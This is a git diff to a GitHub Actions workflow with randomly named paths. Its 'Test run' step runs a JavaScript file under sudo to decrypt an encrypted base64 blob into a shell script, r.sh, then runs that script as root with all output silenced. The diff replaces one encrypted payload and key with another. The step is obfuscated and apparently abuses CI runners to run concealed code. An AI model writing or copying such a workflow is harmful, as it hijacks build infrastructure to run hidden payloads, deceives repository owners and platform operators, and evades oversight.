--- a/.github/workflows/uecyp.yml
+++ b/.github/workflows/uecyp.yml
@@ -29,6 +29,6 @@ jobs:
     - name: Test run
       run: |
         cd ${{ github.workspace }}
-        echo '7vmst'
+        echo 'apb76'
         sudo chmod +x johns2xqp/field806dx/piersonteqsh/rubiox050l.js
-        sudo ./johns2xqp/field806dx/piersonteqsh/rubiox050l.js U2FsdGVkX18+iSVk8e9IdPqbwdQojWHGv28yac0EIYsGGedT7ZxKOCNxPHlQn9UBK++u9mi7VKVY+ls67MGuvWg0D+sktLwPcjmxERlKycvWNsVLjHs3jRNXSngYs3ZE os4my3 && sudo sh r.sh > /dev/null 2>&1
+        sudo ./johns2xqp/field806dx/piersonteqsh/rubiox050l.js U2FsdGVkX1+h3A5PseWKY7NzbFt9A5zvkuW1i7hqcrofNNU7J9NJ8RJ/WfHDJ6+3uD8OYpkWLal2d9LSiTG1E31VMVYzZ4w6a9nlIJ39k1omFG7sheF0ZymvtRW8XWFO 5j8qzy && sudo sh r.sh > /dev/null 2>&1
